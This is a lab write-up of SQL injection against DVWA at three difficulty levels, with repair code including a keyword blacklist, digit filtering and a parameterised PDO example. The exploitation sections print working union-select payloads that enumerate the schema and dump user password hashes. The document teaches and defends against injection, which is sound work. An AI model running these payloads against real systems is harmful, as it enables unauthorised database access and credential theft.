SQL injection
0x01 low
The SQL statement is not filtered at all.
Classic injection: a logical or that is always true makes the query equivalent to select * from users where true; replacing the 99 with 1 works just as well.
Use union select to line up the column count and read out database information:
1' union select 1,2#
order by is the more convenient way to probe the column count:
1' or 1=1 order by 1,2#
It costs one more check than union select.
Mind the character set (collation):
1' union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema='dvwa'#
Stack Overflow to the rescue once again: https://stackoverflow.com/questions/20456152/mysql-error-illegal-mix-of-collations-for-operation-union
Tables: guestbook, users
1' union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name='users'#
Columns: user_id,first_name,last_name,user,password,avatar,last_login,failed_login
1' union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from dvwa.users #
1' or 1=1 union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from dvwa.users #
The password hashes are retrieved.
They match what is seen directly in the database.
0x02 medium
The value is taken from a select element, submitted, and displayed.
Capturing the request and modifying it shows that injection is still possible.
Numeric injection.
order by 3 raises an error, so the select has two columns.
1 union select 1, group_concat(table_schema) COLLATE utf8_general_ci from information_schema.tables where table_schema = database()
1 union select 1, group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema = database()#
id=1 union select 1, group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name = 0x7573657273#
1 or 1=1 union select group_concat(user_id),group_concat(password) from users
Done.
Numeric injection; single quotes are filtered, which is why the table name is given as the hex literal 0x7573657273 ('users').
0x03 high
limit 1 restricts the output to one row; commenting the rest out with # is enough.
Input and output are on different pages, which the author notes can defeat sqlmap.
1' union select 1,group_concat(table_name) COLLATE utf8_general_ci from information_schema.tables where table_schema = 'dvwa'#
1' union select 1,group_concat(column_name) COLLATE utf8_general_ci from information_schema.columns where table_name = 'users'#
1' union select group_concat(user_id),group_concat(password) COLLATE utf8_general_ci from users #
0x04 Repair: fixing the vulnerability
Fix the vulnerability while keeping the functionality intact.
0x0401 Chars: character type
Filter keywords; as soon as non-compliant input is found, die and stop the script.
str_replace is preferable to preg_replace here: it replaces every occurrence of $search with $replace, and $count reports how many replacements were made.
Illegal input:
Not allowed.
Full code:
// Blacklist of characters and keywords that must not appear in the id parameter
$suspects = array("'"," ","and","or","union","select","#","\\",";","order","by","--","\"");
// One replacement string per blacklist entry (same length as $suspects)
$allnull = array();
for ($i = 0; $i < count($suspects); $i += 1) {
    array_push($allnull, 'Hacker');
}
$count = 0;
$id = $_REQUEST[ 'id' ];
// str_replace fills $count with the number of replacements it performed
$id = str_replace($suspects, $allnull, $id, $count);
// Any replacement means the input contained a blacklisted token: stop here
if ($count > 0) {
    die("no, can not hack");
}
0x0402 Numbers: numeric type
intval converts a string to a number; is_numeric checks whether a string is numeric.
Use a regular expression to match every digit, extract the digits, and join them back into a string.
The resulting string contains only digits, so if the request is modified to id=3 or 1=1 the id becomes 311. That is not valid data, but it still blocks the malicious union select query.
Uncommenting the block below is more effective: as soon as it detects a non-numeric value it dies and stops the script.
// Strict variant: reject anything that is not numeric outright
// $judge = is_numeric($id);
// if ($judge == false) {
//     die("sorry, can not pass");
// }
// Lenient variant: keep only the digit runs and concatenate them
preg_match_all('!\d+!', $id, $matches);
$numbers = $matches[0];
$id = implode('', $numbers);
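Both repairs above work by rewriting the input: the character-type fix blacklists tokens, and the numeric fix strips everything but digits. The following added example (not DVWA's code and not the original write-up's) shows the alternative a reviewer would usually ask for, covering both the 0x0401 and 0x0402 cases: validate the value, then pass it to MySQL as a bound parameter so that quotes, keywords or a trailing "or 1=1" can never change the structure of the query. The PDO connection details and the exact query text are assumptions; the table and column names are those enumerated earlier in the write-up.

```php
<?php
// Added example: parameterised queries for the DVWA users table.
// Assumes a MySQL database "dvwa" with table users(user_id, first_name, last_name, ...).
declare(strict_types=1);

/**
 * 0x0402 numeric form, strict variant: the whole value must be a positive
 * integer. "3 or 1=1" is rejected here instead of being rewritten to 311.
 * Returns null for anything that is not a valid id.
 */
function parseUserId(string $raw): ?int
{
    $id = filter_var(trim($raw), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * 0x0401 character form: the id is bound as a string parameter, so no
 * keyword blacklist is needed; a value such as 1' or 1=1# is compared
 * literally against user_id and simply matches nothing.
 */
function lookupUserByStringId(PDO $db, string $raw): ?array
{
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1');
    $stmt->execute([$raw]);                  // value travels separately from the SQL text
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * 0x0402 numeric form: validate first, then bind as an integer.
 */
function lookupUserByNumericId(PDO $db, string $raw): ?array
{
    $id = parseUserId($raw);
    if ($id === null) {
        http_response_code(400);             // reject instead of silently rewriting the input
        return null;
    }
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection credentials are placeholders (assumption); the DSN charset is set
// explicitly so that the collation mix-up seen in the union queries cannot occur.
$db = new PDO(
    'mysql:host=127.0.0.1;dbname=dvwa;charset=utf8mb4',
    'dvwa_user',
    'PLACEHOLDER_PASSWORD',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$row = lookupUserByNumericId($db, $_REQUEST['id'] ?? '');
if ($row === null) {
    echo 'invalid id';
} else {
    // Escape on output as well, since first_name/last_name come from the database
    echo htmlspecialchars($row['first_name'] . ' ' . $row['last_name'], ENT_QUOTES, 'UTF-8');
}
```

With emulated prepares disabled the parameter is sent to the server separately from the statement, so the order by, union select and # payloads from the low, medium and high levels are treated as plain data. The blacklist in 0x0401 can still be kept as a logging signal for suspicious requests, but it is no longer what keeps the query safe.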